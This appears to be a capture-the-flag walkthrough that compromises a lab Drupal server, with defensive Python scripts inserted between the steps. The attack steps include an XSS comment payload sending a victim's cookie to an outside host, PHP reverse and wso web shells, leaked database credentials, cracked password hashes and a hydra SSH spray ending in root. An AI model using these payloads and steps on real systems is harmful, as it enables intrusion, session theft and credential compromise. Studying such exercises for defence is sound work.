- First step: scan the application with Nmap / Nikto:
- nmap -sV 172.16.11.181
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.5
22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)
25/tcp   open  smtp        Symantec Enterprise Security manager smtpd
80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
443/tcp  open  ssl/http    Apache httpd 2.2.3 ((CentOS))
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd
995/tcp  open  ssl/pop3    Dovecot pop3d
3306/tcp open  mysql       MySQL (unauthorized)
5801/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
5802/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5902)
5901/tcp open  vnc         VNC (protocol 3.8)
5902/tcp open  vnc         VNC (protocol 3.8)
5903/tcp open  vnc         VNC (protocol 3.8)
6001/tcp open  X11         (access denied)
6002/tcp open  X11         (access denied)
6003/tcp open  X11         (access denied)
6004/tcp open  X11         (access denied)
Service Info: Host: localhost.localdomain; OS: Unix, CentOS
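The service table above is worth reading from the defender's side as an exposure inventory. The following script is an added example (not part of the original write-up): it parses an nmap -sV service table into records and groups the open ports by risk class, so that cleartext-authentication protocols, remote display services and a database listener stand out. The embedded table is a subset of the scan output above; the category sets are my own assumptions about what should not face an untrusted network.

```python
import re

# Sample input: a subset of the nmap -sV service table from the scan above,
# embedded here so the script runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.5
22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)
25/tcp   open  smtp        Symantec Enterprise Security manager smtpd
80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
443/tcp  open  ssl/http    Apache httpd 2.2.3 ((CentOS))
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd
995/tcp  open  ssl/pop3    Dovecot pop3d
3306/tcp open  mysql       MySQL (unauthorized)
5801/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
5901/tcp open  vnc         VNC (protocol 3.8)
6001/tcp open  X11         (access denied)
"""

# One nmap service row: port/proto, state, service name, free-text version.
_ROW = re.compile(r'^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$')

# Assumed risk classes (my categorisation, not nmap's): protocols that send
# credentials in the clear, remote display/desktop services, and databases.
CLEARTEXT_AUTH = {'ftp', 'pop3', 'imap', 'telnet'}
REMOTE_ACCESS = {'vnc', 'vnc-http', 'X11'}
DB_SERVICES = {'mysql', 'postgresql'}


def parse_nmap_services(text: str) -> list:
    """Turn the nmap -sV table into a list of dicts; non-matching lines
    (header, service-info footer) are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({'port': int(port), 'proto': proto, 'state': state,
                         'service': service, 'version': version})
    return rows


def exposure_report(rows: list) -> dict:
    """Group open ports by risk class so the review can start with the
    services that should be firewalled, bound to localhost, or retired."""
    report = {'cleartext_auth': [], 'remote_access': [], 'database': [], 'other': []}
    for r in rows:
        if r['state'] != 'open':
            continue
        svc = r['service']
        if svc in CLEARTEXT_AUTH:
            report['cleartext_auth'].append(r['port'])
        elif svc in REMOTE_ACCESS:
            report['remote_access'].append(r['port'])
        elif svc in DB_SERVICES:
            report['database'].append(r['port'])
        else:
            report['other'].append(r['port'])
    return report


if __name__ == '__main__':
    for category, ports in exposure_report(parse_nmap_services(NMAP_OUTPUT)).items():
        print(f'{category:15s} {ports}')
```

On this host the cleartext mail protocols have TLS counterparts (993, 995) already listening, so the plain ones could simply be closed; the VNC and X11 listeners and the MySQL port are the ones a reviewer would ask to see justified.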
- nikto -h 172.16.11.181
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3268: /scripts/: Directory indexing found.
+ robots.txt contains 36 entries which should be manually viewed.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ ETag header found on server, fields: 0x0f09ceda40c2bc564fc7b1c947d96711
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3093: /mail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
+ OSVDB-3268: /sites/: Directory indexing found.
+ 6456 items checked: 1 error(s) and 41 item(s) reported on remote host
+ End Time: 2017-02-20 18:05:24 (537 seconds)
More information (from visiting the reported paths):
/webmail/src/read_body.php: SquirrelMail version 1.4.8-21.el5.centos, by the SquirrelMail Project Team
XML-RPC server accepts POST requests only.
CentOS, Apache 2.2
- Checking the website (view source, create a new account, buttons etc.):
* Insert a script into the search box and check the source (the script is filtered).
* Find more information about the system via the source code.
* The application is based on Drupal (the theme is /themes/algaglas).
* Retrieved x-powered-by header: PHP/5.1.6, so check phpinfo.
* Create a new user, log in and look for new options:
* All the users have an ID (the first is admin).
* All the pages have an ID (the hidden page has 28).
* There are only 2 users who wrote articles on the website (Barbara from Marketing and Steve from Executives).
- XSS
* Add a comment.
* Add a comment with an alert <script>alert()</script> (Working!)
* The website has users, which means we can get the cookie of someone with higher permissions than mine. I prefer Steve because he has the higher position.
* Paste a comment with a script in one of his articles and wait: <script>new Image().src="http://172.16.3.3:1234/a.php?cookie="+encodeURI(document.cookie);</script>
* There is a contact option; we can send emails to other users, ask them to visit the page, test our social engineering skills :) and take their session.
* Send an email to Steve and wait: "hello steve my name is lior i dont understand what you wrote in line number 5 in this article please check and let me know. Thanks"
* The session ID (SESS cookie) of Steve is SESS86615d91cc2c2a92d23dfb632b363094=fi9ptbbvdc17iaprlchiajeqt7
* We logged in as Steve :)
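The comment-based cookie theft above works because two things are true at once: the comment body is reflected into the article page without output encoding, and the session cookie is readable from script. The following is an added example (not code from the write-up or from Drupal) showing the defender's side of both: a render function that escapes comment text, a detection heuristic for comments carrying active content so they can be held for moderation, and a Set-Cookie builder that marks the session cookie HttpOnly so document.cookie cannot read it. The sample comments and the cookie name are constructed for illustration.

```python
import html
import re

# Constructed sample comments: a harmless one, a cookie-exfiltration payload
# of the kind used above (callback host replaced by a placeholder), and an
# event-handler variant that has no <script> tag at all.
SAMPLE_COMMENTS = [
    'Great article, thanks!',
    '<script>new Image().src="http://attacker.invalid/a.php?cookie="'
    '+encodeURI(document.cookie);</script>',
    '<img src=x onerror="alert(1)">',
]

# Indicators of active content in user-supplied text. This is a moderation
# aid only; the actual protection is escape-on-output in render_comment().
_ACTIVE_CONTENT = re.compile(
    r'<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|document\.cookie',
    re.IGNORECASE,
)


def flag_active_content(comment: str) -> bool:
    """True if the comment contains markup a browser would execute."""
    return _ACTIVE_CONTENT.search(comment) is not None


def render_comment(comment: str) -> str:
    """Output-encode a comment for inclusion in an HTML page.

    '<', '>', '&' and both quote characters become entities, so an injected
    tag is displayed as text instead of being parsed by the reader's browser."""
    return html.escape(comment, quote=True)


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Build a Set-Cookie line for a Drupal-style SESS cookie (name assumed).

    HttpOnly keeps the value out of document.cookie, so even a script that
    does run cannot read it; Secure limits it to HTTPS; SameSite=Lax stops
    most cross-site requests from carrying it."""
    attrs = ['HttpOnly', 'SameSite=Lax']
    if secure:
        attrs.append('Secure')
    return f'Set-Cookie: SESS={session_id}; Path=/; ' + '; '.join(attrs)


def moderate(comments: list) -> tuple:
    """Return (flagged comments, escaped renderings) for a batch of comments."""
    flagged = [c for c in comments if flag_active_content(c)]
    rendered = [render_comment(c) for c in comments]
    return flagged, rendered


if __name__ == '__main__':
    flagged, rendered = moderate(SAMPLE_COMMENTS)
    print(f'{len(flagged)} of {len(SAMPLE_COMMENTS)} comments held for review')
    for r in rendered:
        print(r)
    print(session_cookie_header('example-session-id'))
```

Escaping is applied at render time rather than at submission time so the stored text stays intact and every output path gets the same treatment; the detection regex is deliberately broad, because its job is to queue suspicious comments for a human, not to be the security boundary.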
* Now I will add admin privileges to my user! No need for cookies anymore :)
* Check the website with higher permissions.
* On every page there is an option to change the input format; change it to PHP.
* Insert PHP code and check the page: (Working!)
<?php
phpinfo();
?>
* Insert a PHP reverse shell and a web application shell (wso).
* In the PHP reverse shell I don't have enough permissions, so keep going with wso.
* The wso shell works and the directory is writable, but there is no option to upload files, so we need to download the web application shell code directly to the machine: cd to the file's directory, serve it with SimpleHTTPServer and use wget to download it to a writable place. Run the file.
* Check the /etc/passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
jharraway:x:500:504::/home/jharraway:/bin/bash
spinkton:x:501:505::/home/spinkton:/bin/bash
sholden:x:502:506::/home/sholden:/bin/bash
bdio:x:503:507::/home/bdio:/bin/bash
jalderman:x:504:508::/home/jalderman:/bin/bash
gconnor:x:505:509::/home/gconnor:/bin/bash
sswiney:x:506:510::/home/sswiney:/bin/bash
dhart:x:507:511::/home/dhart:/bin/bash
gprune:x:508:512::/home/gprune:/bin/bash
hplink:x:509:513::/home/hplink:/bin/bash
jgrimes:x:510:514::/home/jgrimes:/bin/bash
shunter:x:511:515::/home/shunter:/bin/bash
jingersol:x:512:516::/home/jingersol:/bin/bash
mswanson:x:513:517::/home/mswanson:/bin/bash
jstone:x:514:518::/home/jstone:/bin/bash
jgoldman:x:515:519::/home/jgoldman:/bin/bash
tmaloney:x:516:520::/home/tmaloney:/bin/bash
xbruce:x:517:521::/home/xbruce:/bin/bash
sloreman:x:518:522:#flag#5b650c18929383074fea8870d857dd2e:/home/sloreman:/bin/bash
- The Nikto scan found an install.php file:
+ OSVDB-3092: /install.php: install.php file found.
There is a note: "To install to a different database, edit the appropriate settings.php file in the sites folder."
* Now we have more permissions. Search in Google for the configuration file of Drupal and find it: settings.php.
* Check the settings.php file:
$db_url = 'mysqli://root:JumpUpAndDown@localhost/drupal';
$db_prefix = '';
MySQL user: root
MySQL password: JumpUpAndDown
* Connect to SQL and find information. The users table holds all the users and their hashes for the application:
SELECT concat(name,':',pass) FROM `users` LIMIT 0,30
* 2 ways to find all the passwords: john tusers --format=Raw-MD5, and crackstation.
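The settings.php finding above is two weaknesses in one line: the application connects to MySQL as root, and the credential sits in a file the web shell could read. The following script is an added example (not from the write-up or from Drupal) of a configuration audit a defender would run over settings.php: it parses the Drupal 6 $db_url, flags a privileged database account, and flags a world-readable file mode. The weak fragment reproduces the value found on this host; the hardened fragment, the account name drupal_app and the placeholder password are my own assumptions about what a least-privilege configuration would look like.

```python
import re
from urllib.parse import urlparse

# Constructed settings.php fragments (illustrative, not a real site's config).
# WEAK_SETTINGS mirrors the value found above: the site runs as MySQL root.
# HARDENED_SETTINGS uses an assumed dedicated account with a placeholder
# password; the account would be granted privileges on the 'drupal' database only.
WEAK_SETTINGS = (
    "$db_url = 'mysqli://root:JumpUpAndDown@localhost/drupal';\n"
    "$db_prefix = '';\n"
)
HARDENED_SETTINGS = (
    "$db_url = 'mysqli://drupal_app:EXAMPLE-PLACEHOLDER-PASSWORD@localhost/drupal';\n"
    "$db_prefix = '';\n"
)

# Accounts a web application should never connect as (assumed list).
PRIVILEGED_DB_USERS = {'root', 'admin', 'mysql'}

# Matches the Drupal 6 style  $db_url = '...';  assignment.
_DB_URL = re.compile(r"\$db_url\s*=\s*'([^']+)'\s*;")


def parse_db_url(settings_text: str) -> dict:
    """Extract $db_url from settings.php text and split it into parts."""
    m = _DB_URL.search(settings_text)
    if not m:
        raise ValueError('no $db_url assignment found')
    u = urlparse(m.group(1))
    return {
        'scheme': u.scheme,
        'user': u.username,
        'password': u.password,
        'host': u.hostname,
        'database': u.path.lstrip('/'),
    }


def audit_db_settings(settings_text: str, file_mode: int = 0o644) -> list:
    """Return a list of findings; an empty list means nothing was flagged.

    file_mode is the permission bits of settings.php as an octal int. It is
    passed in so the function is testable; in practice read it with os.stat."""
    findings = []
    cfg = parse_db_url(settings_text)
    if cfg['user'] in PRIVILEGED_DB_USERS:
        findings.append(
            f"connects as privileged account '{cfg['user']}': create a "
            f"dedicated account granted only on database '{cfg['database']}'"
        )
    if file_mode & 0o004:
        findings.append(
            f"settings.php mode {file_mode:o} is world-readable: any local "
            "account or web shell can read the credential; restrict to owner "
            "and the web server group"
        )
    return findings


if __name__ == '__main__':
    for label, text, mode in (('weak', WEAK_SETTINGS, 0o644),
                              ('hardened', HARDENED_SETTINGS, 0o640)):
        print(label, audit_db_settings(text, mode) or ['no findings'])
```

The check is deliberately structural: it does not need the password to be valid, only to see which account the site uses and who can read the file, which is exactly what determined how far the compromise of this host went.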
Dan:8f75ad3f04fc42f07c95e2f3d0ec3503:BaseballSeason
Jim:2a5de0f53b1317f7e36afcdb6b5202a4:letmein!
Barbara:bed128365216c019988915ed3add75fb:passw0rd
Xavier:3005d829eb819341357bfddf541c175b:thundercats
Jeff:ca594f739e257245f2be69eb546c1c04:sitepass
George:ed2b1f468c5f915f3f1cf75d7068baae:12341234
Tom:971dcf53e88e9268714d9d504753d347:drupalpassword
John:518462cd3292a67c755521c1fb50c909:4summer13
Sally:7a1c07ff60f9c07ffe8da34ecbf4edc2:fantasy
Steve:08d15a4aef553492d8971cdd5198f314:drupal
Johnathan:6dc523ebd2379d96cc0af32e2d224db0:1loveU
lior:e10adc3949ba59abbe56e057f20f883e:123456
Susan:0d42223010b69cab86634bc359ed870b:BobMarley
admin:49265c16d1dff8acef3499bd889299d6:football123
Stacey:85aca385eb555fb6a36a62915ddd8bc7:Seventy70
Sherry:c3319d1016a802db86653bcfab871f4f:1website
Juan:573152cc51de19df50e90b0e557db7fe:swanson
Michael:c7a4476fc64b75ead800da9ea2b7d072:cherry
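The dump above cracks in seconds because Drupal 6 stored passwords as plain, unsalted MD5: one hash of each dictionary word can be compared against every user at once. The following is an added example (not code from the write-up or from Drupal) that shows both sides: a wordlist audit of the kind a defender runs against their own user table to find weak passwords, and the replacement scheme, PBKDF2-HMAC-SHA256 with a per-user random salt and a work factor. The user entries are taken from the dump above; the wordlist is a constructed stand-in for a real dictionary.

```python
import hashlib
import hmac
import os

# Entries from the users dump above (name -> unsalted MD5 as Drupal 6 stored it).
USER_HASHES = {
    'lior': 'e10adc3949ba59abbe56e057f20f883e',
    'Barbara': 'bed128365216c019988915ed3add75fb',
    'Steve': '08d15a4aef553492d8971cdd5198f314',
    'admin': '49265c16d1dff8acef3499bd889299d6',
}

# Constructed mini wordlist standing in for a real dictionary.
WORDLIST = ['password', '123456', 'passw0rd', 'drupal', 'letmein', 'football']


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def audit_unsalted_md5(user_hashes: dict, wordlist: list) -> dict:
    """Password audit against unsalted hashes.

    Each candidate is hashed once and looked up against every stored hash,
    so the cost is one MD5 per dictionary word regardless of how many users
    there are. That reuse across users is precisely the weakness of storing
    unsalted digests. Returns {user: recovered_password}."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {user: lookup[h] for user, h in user_hashes.items() if h in lookup}


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Produce a storable 'salt$iterations$digest' string with PBKDF2-HMAC-SHA256.

    The random per-user salt means two users with the same password get
    different hashes (no shared lookup table), and the iteration count makes
    every guess cost 200k HMAC operations instead of one MD5."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, iterations)
    return f'{salt.hex()}${iterations}${dk.hex()}'


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, iters, digest_hex = stored.split('$')
    dk = hashlib.pbkdf2_hmac('sha256', password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), digest_hex)


if __name__ == '__main__':
    for user, pw in audit_unsalted_md5(USER_HASHES, WORDLIST).items():
        print(f'weak password for {user}: {pw}')
    stored = hash_password('123456')
    print('salted record:', stored)
    print('verify correct:', verify_password('123456', stored))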
- Make a file with the /etc/passwd users and another file with the application's passwords and try them: hydra -L tusers -P tpasswords ssh://172.16.11.181
Users were found:
Username: jharraway Password: letmein!
Username: bdio Password: passw0rd
Username: spinkton Password: football123
- Try to log in to all of them and try to create a file with sudo:
- Username: jharraway Password: letmein! - Not working!
- Username: bdio Password: passw0rd - Not working!
- Username: spinkton Password: football123 - I AM R-O-O-T!!
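The hydra step above succeeds because three users reused their web application password for SSH, and it leaves a very recognisable trace: a burst of failed logins for many different usernames from one source, followed by successes from the same source. The following is an added example (not part of the write-up) of detection logic run over sshd authentication records; the log lines are constructed in the format sshd writes to /var/log/secure on CentOS, and the thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (the format sshd writes to /var/log/secure),
# modelled on a password spray like the one above: many usernames from one
# source, then three successful password logins from the same source. The
# final line is an unrelated key-based login from another host.
SAMPLE_LOG = """\
Feb 20 18:10:01 localhost sshd[4021]: Failed password for jharraway from 172.16.3.3 port 40112 ssh2
Feb 20 18:10:01 localhost sshd[4022]: Failed password for bdio from 172.16.3.3 port 40113 ssh2
Feb 20 18:10:02 localhost sshd[4023]: Failed password for spinkton from 172.16.3.3 port 40114 ssh2
Feb 20 18:10:02 localhost sshd[4024]: Failed password for invalid user admin from 172.16.3.3 port 40115 ssh2
Feb 20 18:10:03 localhost sshd[4025]: Failed password for gconnor from 172.16.3.3 port 40116 ssh2
Feb 20 18:10:03 localhost sshd[4026]: Accepted password for jharraway from 172.16.3.3 port 40117 ssh2
Feb 20 18:10:04 localhost sshd[4027]: Accepted password for bdio from 172.16.3.3 port 40118 ssh2
Feb 20 18:10:05 localhost sshd[4028]: Accepted password for spinkton from 172.16.3.3 port 40119 ssh2
Feb 20 18:12:00 localhost sshd[4100]: Accepted publickey for sholden from 172.16.11.50 port 50002 ssh2
"""

# Accepted/Failed <method> for [invalid user] <user> from <src> port <n>
_AUTH = re.compile(
    r'sshd\[\d+\]: (Accepted|Failed) (\w+) for (?:invalid user )?(\S+) from (\S+) port \d+'
)


def parse_auth_events(text: str) -> list:
    """Extract authentication outcomes from sshd log text."""
    events = []
    for line in text.splitlines():
        m = _AUTH.search(line)
        if m:
            result, method, user, src = m.groups()
            events.append({'result': result, 'method': method, 'user': user, 'src': src})
    return events


def detect_spray(events: list, fail_threshold: int = 3, user_threshold: int = 3) -> dict:
    """Flag sources with many failures spread over many usernames, and list any
    accounts that later succeeded from the same source.

    A single user mistyping a password fails repeatedly against one name;
    a credential-reuse attack fails across many names. Any success from a
    flagged source is the signal to reset that account and review its activity."""
    fail_count = defaultdict(int)
    fail_users = defaultdict(set)
    successes = defaultdict(list)
    for e in events:
        if e['result'] == 'Failed':
            fail_count[e['src']] += 1
            fail_users[e['src']].add(e['user'])
        else:
            successes[e['src']].append(e['user'])
    alerts = {}
    for src, n in fail_count.items():
        if n >= fail_threshold and len(fail_users[src]) >= user_threshold:
            alerts[src] = {
                'failures': n,
                'targeted_users': sorted(fail_users[src]),
                'compromised': successes.get(src, []),
            }
    return alerts


if __name__ == '__main__':
    for src, info in detect_spray(parse_auth_events(SAMPLE_LOG)).items():
        print(f"{src}: {info['failures']} failures across "
              f"{len(info['targeted_users'])} users; successes: {info['compromised']}")
```

The same idea extends to the application side: the cracked Drupal passwords matched the SSH passwords, so a finding like this is also a cue to disable password authentication on SSH in favour of keys and to stop shared credentials between the web application and system accounts.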
Flags:
1. #flag#550e1bafe077ff0b0b67f4e32f29d751 (View Source)
2. #flag#57dbe55b42b307fb4115146d239955d0 (http://172.16.11.181/node/28/)
3. #flag#550e1bafe077ff0b0b67f4e32f29d751 (phpinfo.php)
4. #flag#5b650c18929383074fea8870d857dd2e (/etc/passwd - sloreman)
5. #flag#5e937c51b852e1ee90d42ddb5ccb8997 (ssh root, and all the other users)
6. #flag#fd38e201f27e98e13abcf62890c43303 (sql admin hash)
7. #flag#5e937c51b852e1ee90d42ddb5ccb8997 (bdio + jharraway ssh)
8. #flag#motd-flag (bdio + jharraway ssh)
9. #flag#0ab251c07822d26b07b88136739ae39b (spinkton user)